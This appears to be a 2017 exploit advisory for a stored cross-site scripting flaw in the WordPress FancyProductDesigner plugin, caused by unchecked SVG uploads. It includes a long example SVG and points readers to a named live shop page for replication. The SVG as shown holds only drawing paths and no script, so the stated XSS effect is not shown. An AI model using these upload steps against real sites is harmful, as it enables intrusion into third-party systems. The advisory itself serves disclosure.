WordPress FancyProductDesigner 3.4.2 Stored XSS

Posted May 2, 2017
Authored by Project Insecurity, MLT | Site insecurity.zone

WordPress FancyProductDesigner plugin versions prior to 3.4.2 suffer from a persistent cross site scripting vulnerability due to improper sanitization, allowing malicious .svg file uploads.

tags | exploit, xss, file upload
SHA-256 | e06356cf348ec440bf9bde069022db59898d3360eefbd1156c6c4aaf4c07d21c

           ______  ______   _____     ___   _____   _____   _____              
| ___ \ | ___ \ | _ | |_ | | ___| / __ \ |_ _|
| |_/ / | |_/ / | | | | | | | |__ | / \/ | |
| __/ | / | | | | | | | __| | | | |
| | | |\ \ \ \_/ / /\__/ / | |___ | \__/\ | |
\_| \_| \_| \___/ \____/ \____/ \____/ \_/


_____ _ _ _____ _____ _____ _ _ ______ _____ _____ __ __
|_ _| | \ | | / ___| | ___| / __ \ | | | | | ___ \ |_ _| |_ _| \ \ / /
| | | \| | \ `--. | |__ | / \/ | | | | | |_/ / | | | | \ V /
| | | . ` | `--. \ | __| | | | | | | | / | | | | \ /
_| |_ | |\ | /\__/ / | |___ | \__/\ | |_| | | |\ \ _| |_ | | | |
\___/ \_| \_/ \____/ \____/ \____/ \___/ \_| \_| \___/ \_/ \_/


[+]---------------------------------------------------------[+]
| Vulnerable Software: FancyProductDesigner(WP plugin) |
| Vendor: http://fancyproductdesigner.com |
| Vulnerability Type: Stored XSS + FPD / File upload |
| Date Released: 29/04/2017 |
| Released by: 5tarboy (@insecurity) |
[+]---------------------------------------------------------[+]

Fancy Product Designer is a paid WordPress plugin ($50 fee) that allows users to upload custom products of their choice
to the site. The upload form claims that it only allows files of PNG and JPG format, but it is also possible to upload SVG
files. An estimated 40,000-50,000 sites are vulnerable.

To replicate this vulnerability, navigate to the product upload page and simply upload an .svg payload.
Here is an example: https://www.saltsidecreations.com/product/ozark-20-oz/
It is possible to upload an .svg file via the image upload form; the file is then stored under http://[HOST]/wp-content/uploads/

Here is an example SVG file that can be uploaded (resulting in persistent/stored XSS):
------------------------------------------------------------------------------------------------------------

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="300.000000pt" height="300.000000pt" viewBox="0 0 300.000000 300.000000" preserveAspectRatio="xMidYMid meet">
<metadata>
twitter: @insecurity
</metadata>
<g transform="translate(0.000000,300.000000) scale(0.100000,-0.100000)"
fill="#000000" stroke="none">
<path d="M128 2910 c-1 -49 -2 -100 -2 -112 -1 -19 4 -23 27 -23 15 0 27 3 27 8 0 4 0 54 0 112 l0 105 -25 0 c-25 0 -25 -1 -27 -90z m29 -27 c-3 -10 -5 -2 -5 17 0 19 2 27 5 18 2 -10 2 -26 0 -35z m0 -45 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/>
<path d="M290 2908 c0 -51 -3 -102 -6 -113 -5 -19 0 -20 85 -20 l91 0 0 113 c0 68 -4 112 -10 112 -10 0 -12 -9 -13 -72 0 -21 -4 -38 -9 -38 -4 0 -8 11 -8 24 0 44 -10 56 -38 49 -20 -5 -23 -3 -17 8 8 12 6 12 -8 1 -9 -8 -21 -11 -27 -7 -6 4 -10 3 -9 -2 1 -4 1 -21 0 -37 -2 -45 -12 -24 -14 28 -2 86 -17 46 -17 -46z m110 -21 l0 -62 -30 -1 -30 -2 0 64 0 64 30 0 30 0 0 -63z m30 -62 c-8 -9 -8 -15 0 -18 7 -4 7 -5 0 -3 -7 1 -11 5 -11 9 1 4 1 22 2 40 0 30 1 31 10 8 6 -16 6 -28 -1 -36z m-90 -16 c0 -5 -7 -9 -15 -9 -15 0 -20 12 -9 23 8 8 24 -1 24 -14z"/>
<path d="M600 2888 l0 -113 90 0 90 0 0 113 c0 93 -3 112 -15 112 -9 0 -15 -10 -15 -26 0 -20 -4 -25 -16 -20 -9 3 -18 6 -20 6 -3 0 -3 3 0 8 2 4 -13 6 -35 4 -36 -4 -39 -7 -39 -33 0 -16 -4 -29 -9 -29 -5 0 -6 20 -3 45 4 37 2 45 -12 45 -14 0 -16 -15 -16 -112z m118 -2 c-3 -58 -4 -61 -29 -61 -15 -1 -34 -7 -43 -14 -14 -12 -16 -10 -15 15 0 25 2 26 9 9 7 -18 9 -18 15 -3 4 10 5 41 3 70 l-3 53 33 -3 33 -4 -3 -62z m32 -44 c0 -19 -5 -29 -15 -29 -11 0 -12 4 -5 11 5 5 10 18 10 28 0 10 2 18 5 18 3 0 5 -13 5 -28z"/>
<path d="M919 2900 c-1 -55 -2 -105 -3 -111 -1 -8 28 -12 87 -13 l87 -1 0 113 c0 92 -3 112 -15 112 -9 0 -12 -6 -8 -17 4 -11 3 -14 -5 -9 -8 5 -8 -1 0 -24 5 -17 8 -34 4 -37 -3 -4 -6 0 -6 9 0 22 -33 48 -62 48 -38 0 -52 -36 -44 -109 5 -42 4 -61 -4 -61 -7 0 -11 28 -10 83 2 112 1 117 -10 117 -6 0 -11 -41 -11 -100z m111 -14 l0 -65 -29 1 c-30 1 -30 1 -30 65 l0 63 30 0 29 0 0 -64z m34 -69 c-3 -9 -11 -14 -16 -11 -6 4 -5 10 3 15 11 7 11 9 1 9 -7 0 -10 5 -6 11 10 16 26 -5 18 -24z"/>
<path d="M1211 2894 l3 -107 -50 -24 c-146 -72 -347 -121 -530 -130 l-122 -6 -6 -45 c-18 -134 -2 -496 30 -687 19 -108 84 -310 119 -365 30 -48 31 -57 5 -65 -11 -3 -20 -13 -20 -21 0 -8 -4 -13 -9 -10 -14 9 -7 34 15 51 16 12 17 14 2 15 -9 0 -23 3 -32 6 -14 5 -16 -8 -16 -110 l0 -116 91 0 c90 0 91 0 85 23 -3 12 -6 25 -6 30 0 15 -20 7 -20 -9 0 -8 -4 -13 -9 -9 -5 3 -12 1 -16 -5 -3 -5 -12 -10 -18 -10 -7 0 -4 5 6 11 11 7 17 22 17 49 0 22 3 40 8 40 4 0 18 -17 32 -37 32 -46 101 -117 165 -168 27 -22 59 -48 69 -57 11 -10 28 -20 38 -24 18 -5 19 -15 16 -115 l-3 -109 33 0 32 0 0 54 c0 69 -10 117 -22 110 -10 -6 -28 12 -28 28 0 9 39 -8 107 -47 l53 -30 0 -57 0 -58 91 0 c68 0 90 3 86 13 -2 6 -13 11 -24 9 -11 -1 -26 4 -33 13 -7 8 -25 15 -41 15 -21 0 -29 5 -30 18 0 9 -3 12 -5 5 -3 -7 0 -21 6 -32 8 -17 8 -19 -4 -15 -19 7 -24 22 -21 67 2 32 -2 38 -27 49 -15 7 -28 16 -28 19 0 3 -18 12 -40 19 -22 7 -45 19 -51 27 -6 7 -18 13 -25 13 -8 0 -13 5 -12 12 2 7 -2 12 -9 13 -14 0 -43 24 -61 51 -7 10 -10 13 -7 7 8 -17 -1 -16 -31 4 -19 12 -22 18 -12 25 10 7 9 8 -3 6 -9 -2 -37 16 -62 40 -26 23 -44 42 -42 42 3 0 -3 9 -12 20 -10 11 -23 20 -31 20 -7 0 -10 5 -6 12 4 7 3 8 -4 4 -7 -4 -12 -1 -12 8 0 9 -4 16 -8 16 -4 0 -16 14 -26 30 -9 17 -27 40 -39 52 -21 20 -21 21 -2 14 17 -5 18 -4 4 6 -19 15 -79 139 -79 162 0 9 -4 24 -9 34 -18 35 -30 68 -40 107 -14 53 -14 68 2 59 6 -4 4 1 -5 12 -9 11 -17 28 -17 39 0 11 -5 54 -11 95 -20 135 -23 183 -23 383 0 183 1 198 19 211 12 9 24 11 35 5 9 -4 18 -6 21 -4 3 3 34 7 69 9 82 6 187 24 212 37 10 6 28 9 38 6 13 -3 17 -1 12 6 -4 8 -1 7 9 -1 13 -10 17 -10 22 3 3 8 17 15 31 15 14 0 25 4 25 8 0 5 6 9 13 9 28 1 97 24 97 33 0 6 3 9 8 9 4 -1 10 0 15 1 10 3 25 7 35 9 4 0 19 12 34 26 15 14 42 28 60 32 18 3 44 17 58 30 13 13 29 23 34 23 5 0 16 7 25 15 9 8 29 27 46 42 16 16 35 27 43 25 9 -2 11 1 7 8 -11 18 34 2 58 -21 12 -10 29 -21 39 -25 10 -3 18 -11 18 -19 0 -7 9 -15 21 -18 13 -4 18 -10 13 -18 -4 -8 -3 -10 4 -5 7 4 12 3 12 -3 0 -6 6 -8 13 -6 17 7 80 -33 72 -45 -6 -10 7 -14 31 -11 6 1 17 -6 
24 -14 7 -8 18 -15 26 -15 23 0 64 -23 58 -32 -3 -5 0 -8 7 -7 21 3 79 -13 79 -21 0 -5 10 -6 22 -2 15 4 19 2 13 -7 -5 -10 -2 -11 14 -6 12 4 21 2 21 -4 0 -6 7 -8 15 -5 8 4 22 1 30 -6 9 -7 18 -10 21 -7 3 3 20 1 37 -4 27 -8 129 -16 267 -22 33 -2 35 -4 39 -42 10 -88 4 -486 -8 -585 -7 -58 -13 -115 -13 -127 0 -13 -3 -21 -8 -18 -4 2 -5 -7 -2 -20 2 -15 0 -25 -7 -25 -7 0 -10 -4 -6 -10 6 -9 -39 -178 -51 -189 -4 -3 -3 5 0 19 6 21 5 22 -4 7 -6 -9 -8 -22 -5 -27 6 -11 -41 -117 -62 -138 -7 -7 -13 -18 -13 -23 0 -6 -4 -7 -10 -4 -6 4 -10 -5 -10 -20 0 -17 -7 -29 -22 -35 -13 -5 -19 -9 -14 -9 9 -1 -88 -101 -98 -101 -3 0 -28 -22 -55 -50 -27 -27 -56 -50 -64 -50 -8 0 -22 -11 -31 -25 -9 -14 -24 -25 -34 -25 -14 0 -14 -2 -3 -9 10 -6 27 -1 55 17 52 33 161 127 201 171 16 19 40 46 53 59 l22 25 -1 -39 c0 -21 -3 -34 -5 -27 -8 18 -34 4 -34 -18 0 -17 8 -19 88 -19 l87 0 -3 113 c-3 114 -3 114 -27 109 -15 -2 -22 -9 -18 -18 3 -8 9 -11 14 -8 5 3 9 -5 9 -17 0 -21 -1 -21 -20 -4 -19 17 -19 16 -17 -54 l2 -71 -31 0 c-31 0 -32 0 -29 46 2 28 11 55 23 68 62 69 142 314 168 516 18 136 25 536 11 630 l-8 55 -109 2 c-186 4 -350 41 -528 121 l-83 37 3 94 c2 71 0 95 -10 99 -9 3 -13 -3 -12 -14 1 -11 1 -37 0 -59 l-3 -40 -6 35 c-4 20 -2 39 4 43 6 5 2 6 -9 3 -10 -4 -24 -2 -30 3 -6 5 -21 5 -33 0 -26 -10 -48 -45 -33 -54 5 -3 10 -10 10 -16 0 -5 -9 -4 -20 3 -12 8 -18 19 -14 28 3 8 7 23 9 33 2 9 7 22 10 27 3 6 -4 10 -16 10 -19 0 -21 -4 -16 -35 3 -19 3 -35 -1 -35 -3 0 -21 14 -39 32 l-33 32 -25 -24 c-54 -55 -65 -60 -65 -30 0 18 10 25 33 21 4 0 7 8 7 19 0 15 -7 20 -25 20 -23 0 -25 -3 -25 -48 0 -47 -2 -50 -47 -79 -74 -48 -125 -74 -130 -69 -11 11 7 35 22 30 13 -5 15 7 15 80 0 96 -17 118 -23 29 l-3 -58 -2 58 c-2 44 -5 57 -18 57 -13 0 -15 -15 -13 -106z m489 6 c0 -27 5 -50 10 -50 6 0 10 8 10 17 0 22 6 14 14 -20 6 -26 5 -27 -14 -17 -11 6 -20 9 -20 6 0 -3 -13 7 -29 22 -16 16 -31 41 -33 60 -4 31 -3 32 29 32 33 0 33 0 33 -50z m-990 -1459 c5 -11 10 -40 10 -65 0 -43 -2 -46 -27 -46 -14 0 -35 -7 -45 -17 -17 -15 -18 -15 -18 0 0 10 6 16 13 15 8 -2 
13 17 15 65 3 58 5 67 22 67 11 0 24 -9 30 -19z m-78 -83 c-7 -7 -12 -8 -12 -2 0 14 12 26 19 19 2 -3 -1 -11 -7 -17z m1737 -49 c-16 -10 -23 -4 -14 10 3 6 11 8 17 5 6 -4 5 -9 -3 -15z m-1276 -289 c-3 -12 -8 -19 -11 -16 -5 6 5 36 12 36 2 0 2 -9 -1 -20z m-6 -52 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/>
<path d="M1872 2889 l3 -112 28 -3 27 -3 0 115 c0 97 -2 114 -16 114 -13 0 -15 -14 -12 -95 2 -52 0 -95 -4 -95 -5 0 -8 43 -8 95 0 59 -4 95 -10 95 -7 0 -10 -40 -8 -111z"/>
<path d="M2040 2888 l0 -113 30 0 30 0 0 113 c0 117 -16 156 -23 55 l-3 -58 -2 58 c-2 43 -6 57 -17 57 -12 0 -15 -19 -15 -112z m43 -28 c3 -11 1 -23 -4 -26 -5 -3 -9 6 -9 20 0 31 6 34 13 6z"/>
<path d="M2220 2888 l0 -113 85 2 c47 1 85 5 85 8 0 3 0 52 0 110 0 63 -4 105 -10 105 -5 0 -11 -17 -11 -37 l-2 -38 -7 40 c-5 30 -8 33 -9 13 0 -15 -6 -30 -12 -33 -6 -4 -9 -31 -8 -62 3 -55 2 -56 -27 -59 l-29 -3 2 62 c1 62 1 62 32 65 38 4 31 22 -8 22 -45 0 -55 -21 -48 -98 5 -51 4 -63 -5 -48 -7 12 -9 48 -5 98 5 65 4 78 -8 78 -12 0 -15 -20 -15 -112z m147 -70 c-2 -13 -4 -3 -4 22 0 25 2 35 4 23 2 -13 2 -33 0 -45z"/>
<path d="M2510 2895 c0 -58 0 -108 0 -112 0 -4 12 -7 28 -7 27 0 27 0 25 65 -1 35 -2 85 -2 112 -1 46 -15 64 -24 30 -4 -17 -5 -17 -6 0 0 9 -5 17 -11 17 -6 0 -10 -42 -10 -105z m27 -67 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z"/>
<path d="M2690 2901 c0 -55 -2 -105 -5 -113 -4 -10 14 -13 85 -13 l90 0 0 113 c0 68 -4 112 -10 112 -9 0 -11 -9 -15 -62 -1 -26 -15 -34 -15 -10 0 29 -45 59 -64 43 -16 -14 -46 -4 -46 15 0 8 -4 14 -10 14 -6 0 -10 -40 -10 -99z m112 -16 c-4 -64 -4 -65 -30 -62 -26 3 -27 7 -30 65 l-2 62 32 0 33 0 -3 -65z m-85 3 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m119 -57 c-4 -6 -13 -11 -19 -10 -9 0 -9 2 0 5 7 3 9 13 6 22 -5 13 -3 14 7 5 7 -6 9 -16 6 -22z m-112 4 c3 -8 1 -15 -4 -15 -6 0 -10 7 -10 15 0 8 2 15 4 15 2 0 6 -7 10 -15z m99 -32 c-7 -2 -19 -2 -25 0 -7 3 -2 5 12 5 14 0 19 -2 13 -5z"/>
<path d="M1490 2762 c-8 -3 -19 -11 -23 -19 -5 -7 -14 -10 -20 -7 -7 4 -9 4 -5 -1 11 -12 -40 -48 -58 -41 -10 4 -14 1 -11 -6 5 -16 -89 -70 -121 -70 -12 0 -25 -5 -29 -11 -4 -6 -1 -7 7 -2 8 5 11 4 6 -3 -3 -6 -20 -13 -36 -17 -16 -4 -32 -11 -35 -16 -4 -5 -22 -9 -41 -9 -19 0 -33 -4 -30 -9 4 -5 -13 -12 -36 -16 -24 -4 -69 -13 -100 -21 -32 -8 -96 -16 -143 -17 -116 -4 -114 -1 -115 -202 0 -161 15 -346 30 -376 5 -9 6 -27 3 -39 -3 -13 -2 -21 3 -18 5 4 10 -11 12 -33 1 -21 11 -58 21 -81 10 -24 16 -49 14 -55 -3 -7 1 -13 7 -13 7 0 9 -9 5 -22 -5 -18 -4 -20 4 -8 9 13 11 13 11 0 0 -20 33 -84 53 -105 9 -8 14 -22 10 -30 -4 -11 0 -14 13 -9 11 4 16 4 13 0 -6 -6 44 -69 88 -110 52 -49 88 -81 93 -81 17 -1 52 -36 47 -48 -4 -10 1 -13 19 -9 14 2 32 -2 42 -11 9 -8 27 -18 40 -22 12 -3 20 -11 16 -16 -3 -5 -2 -8 3 -7 14 4 94 -32 89 -40 -3 -5 8 -7 25 -6 21 1 29 -2 29 -14 0 -14 2 -14 9 -3 7 11 12 10 28 -6 11 -11 31 -18 48 -17 17 1 35 -3 42 -8 8 -7 18 -5 28 6 9 9 22 16 28 16 7 0 29 9 50 20 43 23 51 25 41 8 -4 -7 2 -4 13 8 11 11 41 28 67 38 27 10 43 22 40 28 -4 6 -2 8 3 5 12 -7 139 74 160 101 7 9 13 14 13 10 0 -11 81 75 125 132 22 29 48 61 57 71 9 9 14 20 11 23 -3 2 5 15 16 27 12 13 19 29 17 35 -2 6 2 21 9 31 8 11 22 48 31 81 9 34 21 59 26 56 4 -3 8 -1 8 5 0 5 -4 12 -8 15 -4 3 -6 21 -4 42 3 21 8 31 12 24 18 -30 28 199 20 493 -2 82 -5 100 -21 111 -10 7 -17 15 -14 18 7 7 -27 7 -45 0 -25 -9 -50 -10 -50 0 0 5 -21 8 -47 7 -27 -1 -61 1 -78 4 -92 14 -114 20 -108 30 3 5 1 7 -5 3 -6 -3 -23 -1 -39 6 -15 6 -31 12 -35 13 -5 2 -10 4 -13 5 -7 3 -22 7 -36 9 -5 0 -8 5 -5 10 3 5 -1 12 -10 15 -8 3 -12 2 -9 -4 10 -16 -11 -12 -25 4 -6 8 -19 12 -27 9 -11 -4 -14 -2 -9 5 6 11 2 13 -19 12 -3 -1 -12 5 -20 12 -32 29 -45 39 -45 33 0 -3 -14 7 -31 22 -45 41 -82 61 -99 55z m141 -115 c50 -32 134 -74 211 -105 73 -30 209 -54 304 -56 l102 -1 6 -73 c24 -262 -17 -595 -94 -767 -58 -129 -174 -257 -315 -350 -98 -64 -122 -76 -242 -125 l-95 -38 -68 23 c-117 40 -244 107 -345 184 -217 165 -325 375 -354 691 -19 214 -21 245 -14 341 l6 96 106 6 c151 
9 294 48 433 118 77 39 188 111 213 139 l19 21 35 -34 c20 -19 61 -50 92 -70z"/>
<path d="M1330 2441 c-104 -26 -140 -41 -140 -57 0 -19 20 -18 89 6 91 30 227 44 316 30 77 -12 98 -9 89 14 -6 16 -3 15 -154 21 -100 3 -140 1 -200 -14z"/>
<path d="M1737 2413 c-9 -14 5 -27 44 -41 46 -16 59 -15 59 3 0 22 -92 55 -103 38z"/>
<path d="M1377 2373 c-20 -3 -27 -9 -25 -21 2 -11 11 -16 23 -13 11 2 70 3 130 4 154 1 256 -32 368 -117 48 -37 77 -46 77 -24 0 37 -159 128 -276 158 -73 19 -216 25 -297 13z"/>
<path d="M1200 2310 c-74 -39 -180 -122 -180 -141 0 -25 33 -19 63 11 40 41 137 105 183 120 23 8 34 17 32 28 -5 26 -20 23 -98 -18z"/>
<path d="M1438 2298 c-37 -3 -85 -12 -105 -19 -180 -58 -321 -211 -340 -368 -5 -47 -4 -51 14 -51 17 0 22 9 28 47 11 73 57 163 111 216 97 97 200 138 349 142 77 2 100 6 100 16 0 18 -70 26 -157 17z"/>
<path d="M1647 2273 c-14 -13 -6 -22 31 -33 20 -7 57 -23 81 -37 39 -23 45 -24 59 -9 14 14 9 18 -59 51 -72 35 -99 41 -112 28z"/>
<path d="M990 2235 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0 -10 -7 -10 -15z"/>
<path d="M1467 2224 c-21 -21 -3 -32 66 -36 126 -9 221 -58 292 -150 44 -58 65 -124 65 -208 0 -65 2 -70 21 -70 21 0 21 4 17 93 -3 81 -8 99 -38 155 -50 94 -142 167 -250 200 -47 14 -164 25 -173 16z"/>
<path d="M1322 2188 c-41 -17 -72 -36 -72 -44 0 -20 14 -18 89 12 78 31 86 37 69 52 -10 8 -32 3 -86 -20z"/>
<path d="M1853 2154 c-3 -10 7 -29 29 -52 19 -20 44 -56 54 -79 20 -45 33 -56 53 -43 16 10 -12 66 -69 138 -43 55 -57 62 -67 36z"/>
<path d="M772 2135 c0 -16 2 -22 5 -12 2 9 2 23 0 30 -3 6 -5 -1 -5 -18z"/>
<path d="M1410 2136 c-69 -19 -111 -44 -159 -94 -52 -54 -80 -113 -81 -164 0 -31 4 -38 20 -38 14 0 20 7 20 23 0 109 106 219 233 242 27 5 37 12 35 23 -4 21 -15 22 -68 8z"/>
<path d="M1543 2143 c-27 -9 -12 -32 25 -38 20 -4 47 -10 60 -16 17 -7 24 -5 29 6 3 9 3 18 0 21 -9 9 -102 31 -114 27z"/>
<path d="M1173 2088 c-58 -61 -86 -132 -93 -234 -4 -81 -8 -94 -29 -111 -14 -11 -21 -25 -17 -31 11 -19 31 -14 57 14 21 22 25 39 30 118 6 102 29 162 82 216 17 18 27 36 23 45 -8 22 -19 19 -53 -17z"/>
<path d="M1695 2070 c-3 -5 11 -26 31 -46 63 -64 76 -108 73 -242 -3 -101 -1 -117 12 -120 25 -5 29 18 26 151 -2 135 -10 158 -76 230 -35 37 -55 45 -66 27z"/>
<path d="M1445 2063 c-38 -8 -90 -36 -118 -62 -49 -45 -67 -92 -67 -176 0 -90 -22 -141 -81 -194 -39 -33 -52 -71 -25 -71 23 0 124 117 135 158 6 20 11 66 11 101 0 112 41 170 144 205 61 21 131 9 189 -31 59 -41 77 -86 77 -191 0 -156 -47 -280 -151 -395 -49 -54 -57 -68 -44 -73 19 -8 70 37 124 111 78 106 111 209 111 349 0 116 -16 162 -72 212 -56 50 -155 75 -233 57z"/>
<path d="M1424 1970 c-55 -28 -72 -65 -77 -170 -4 -102 -23 -143 -96 -215 -49 -48 -66 -85 -37 -85 19 0 122 113 147 162 15 30 23 70 28 141 6 95 8 100 36 123 23 18 42 24 83 24 46 0 58 -4 83 -29 28 -28 29 -33 29 -119 0 -158 -53 -275 -179 -396 -34 -31 -61 -62 -61 -67 0 -28 45 0 112 69 134 138 162 205 163 384 0 110 -1 118 -25 143 -52 57 -134 70 -206 35z"/>
<path d="M1459 1897 c-13 -10 -18 -34 -20 -102 -5 -119 -33 -176 -133 -275 -41 -40 -73 -77 -70 -82 13 -20 40 -3 110 67 96 96 124 156 133 280 5 81 8 90 26 90 18 0 20 -8 23 -64 6 -136 -30 -222 -145 -340 -45 -47 -80 -89 -77 -93 11 -18 33 -4 107 70 111 110 148 187 155 323 4 86 2 102 -13 119 -21 23 -71 26 -96 7z"/>
<path d="M1170 1771 c0 -22 -12 -41 -45 -73 -44 -42 -58 -78 -31 -78 18 0 94 83 106 116 16 41 12 64 -10 64 -15 0 -20 -7 -20 -29z"/>
<path d="M1774 1603 c-3 -10 -12 -33 -20 -52 -16 -35 -8 -56 17 -46 16 6 51 94 43 107 -9 14 -34 8 -40 -9z"/>
<path d="M1595 1330 c-3 -5 -1 -10 4 -10 6 0 11 5 11 10 0 6 -2 10 -4 10 -3 0 -8 -4 -11 -10z"/>
<path d="M124 2497 l1 -112 87 -2 88 -2 0 115 0 114 -88 0 -88 0 0 -113z m149 68 c-7 -21 -13 -19 -13 6 0 11 4 18 10 14 5 -3 7 -12 3 -20z m-101 3 c-5 -7
-12 -22 -15 -33 -3 -13 -5 -9 -6 13 -1 23 3 32 15 32 12 0 14 -3 6 -12z m70 -59 c-3 -42 0 -75 6 -81 14 -14 26 30 20 72 -2 16 -1 27 4 24 9 -6 11 -75 2 -98 -3 -9 -15 -16 -26 -16 -10 0 -16 5 -13 10 4 6 -7 10 -24 10 l-31 0 0 65 0 65 30 0 c17 0 30 5 30 10 0 6 1 10 3 10 1 0 1 -32 -1 -71z m-58 -92 c7 -5 3 -7 -9 -5 -13 2 -21 12 -23 28 -2 24 -2 24 9 5 7 -11 17 -24 23 -28z"/>
<path d="M420 2497 l0 -114 30 -1 30 -1 0 115 0 114 -30 0 -30 0 0 -113z m31 -24 c2 -23 0 -45 -4 -49 -4 -4 -7 17 -7 46 0 62 7 64 11 3z"/>
<path d="M2527 2498 l2 -112 86 -3 85 -3 0 115 0 115 -87 0 -88 0 2 -112z m73 88 c0 -3 -4 -8 -10 -11 -5 -3 -10 -1 -10 4 0 6 5 11 10 11 6 0 10 -2 10 -4z m-30 -15 c0 -6 -4 -12 -8 -15 -5 -3 -9 1 -9 9 0 8 4 15 9 15 4 0 8 -4 8 -9z m108 -18 c2 -12 -1 -30 -7 -40 -8 -14 -9 -8 -4 21 4 27 3 37 -5 32 -6 -3 -14 -1 -17 5 -5 7 0 10 11 7 11 -2 20 -13 22 -25z m-38 -58 l0 -65 -30 0 -30 0 1 65 c2 65 2 65 30 65 29 0 29 0 29 -65z m35 -66 c-4 -11 -15 -19 -26 -19 -11 0 -17 5 -14 10 3 6 13 10 20 10 11 0 13 9 9 33 -4 29 -4 30 6 8 6 -13 8 -32 5 -42z m-106 -7 c1 -7 -3 -10 -9 -7 -5 3 -10 18 -9 33 0 24 1 25 9 7 5 -11 9 -26 9 -33z"/>
<path d="M2800 2495 l0 -115 30 0 30 0 0 115 0 115 -30 0 -30 0 0 -115z m40 -31 c0 -34 -4 -53 -10 -49 -5 3 -10 28 -10 56 0 27 5 49 10 49 6 0 10 -25 10 -56z"/>
<path d="M123 2140 l-1 -110 29 0 29 0 0 94 c0 52 3 101 6 110 5 13 -1 16 -27 16 l-34 0 -2 -110z"/>
<path d="M285 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m147 68 c-2 -10 -6 -18 -8 -18 -2 0 -8 8 -13 18 -7 14 -6 18 8 18 12 0 17 -6 13 -18z m-32 -71 l0 -64 -30 5 c-29 4 -30 5 -30 63 0 59 0 59 30 59 l30 0 0 -63z m37 -27 c4 -48 3 -59 -8 -55 -10 4 -13 21 -11 66 5 74 13 70 19 -11z m-114 -4 c2 -16 12 -35 23 -43 18 -14 18 -14 -6 -11 -27 3 -39 28 -32 66 6 28 10 25 15 -12z"/>
<path d="M2510 2140 l0 -110 28 0 27 0 0 110 0 110 -27 0 -28 0 0 -110z m27 -42 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z"/>
<path d="M2685 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m135 73 c0 -14 -2 -15 -9 -4 -6 10 -20 12 -45 8 -20 -3 -36 -2 -36 2 0 4 20 8 45 10 38 2 45 -1 45 -16z m-20 -73 c0 -60 0 -60 -30 -60 -30 0 -30 0 -30 60 0 60 0 60 30 60 30 0 30 0 30 -60z m40 44 c0 -8 -5 -12 -10 -9 -6 4 -8 11 -5 16 9 14 15 11 15 -7z m-104 -119 c13 -9 12 -11 -5 -11 -19 0 -21 6 -19 56 1 53 2 53 5 11 3 -25 11 -50 19 -56z m91 73 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m13 -43 c0 -25 -32 -50 -53 -41 -7 2 -4 5 6 5 11 1 20 12 24 31 7 36 23 40 23 5z"/>
<path d="M124 1750 l1 -110 88 0 87 0 0 110 0 110 -88 0 -89 0 1 -110z m37 53 c-9 -16 -10 -14 -11 12 0 21 3 26 11 18 8 -8 8 -16 0 -30z m93 21 c5 -14 4 -15 -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-14 -77 c0 -62 0 -63 -27 -61 -27 1 -28 3 -31 62 l-3 62 31 0 30 0 0 -63z m37 11 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m-13 -85 c-17 -17 -18 -17 -11 0 4 10 7 24 7 30 0 8 3 8 11 0 9 -9 7 -16 -7 -30z m-94 2 c10 -12 10 -15 -4 -15 -9 0 -16 7 -16 15 0 8 2 15 4 15 2 0 9 -7 16 -15z"/>
<path d="M420 1750 l0 -110 30 0 30 0 0 110 0 110 -30 0 -30 0 0 -110z"/>
<path d="M2525 1750 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m45 66 c0 -23 -16 -27 -17 -5 -1 10 2 19 8 19 5 0 9 -6 9 -14z m101 -3 c5 -97 5 -134 -2 -145 -5 -8 -9 17 -9 59 0 39 -3 78 -6 87 -3 9 -1 16 5 16 6 0 11 -8 12 -17z m-29 -72 c2 -52 0 -67 -9 -60 -6 6 -20 9 -30 7 -16 -3 -18 5 -21 60 l-3 62 30 0 29 0 4 -69z m-85 -23 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m20 -44 c2 -6 -3 -11 -12 -11 -8 0 -15 7 -15 15 0 15 22 12 27 -4z"/>
<path d="M2800 1751 c0 -108 0 -109 25 -113 13 -3 27 -3 30 0 3 3 5 54 5 114 l0 108 -30 0 -30 0 0 -109z m40 -11 c0 -33 -4 -60 -9 -60 -9 0 -14 98 -5 112 11 17 14 6 14 -52z"/>
<path d="M641 1634 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z"/>
<path d="M129 1507 c0 -1 -1 -53 -2 -115 l-2 -112 28 0 27 0 0 105 c0 58 1 108 3 111 1 4 -10 8 -25 10 -16 1 -28 2 -29 1z m28 -99 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z"/>
<path d="M290 1505 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111 -83 1 c-45 1 -82 2 -82 2z m142 -47 c5 -76 3 -144 -7 -150 -16 -12 -35 -9 -32 5 1 7 -10 13 -26 15 -28 3 -28 4 -25 65 3 59 4 62 31 64 l27 2 0 -70 c0 -44 4 -69 11 -69 8 0 10 26 7 80 -2 44 0 80 4 80 5 0 9 -10 10 -22z m-109 -3 c-3 -9 -8 -14 -10 -11 -3 3 -2 9 2 15 9 16 15 13 8 -4z m10 -144 c10 -11 9 -13 -3 -9 -17 5 -28 59 -20 103 4 22 6 16 8 -25 2 -30 9 -61 15 -69z"/>
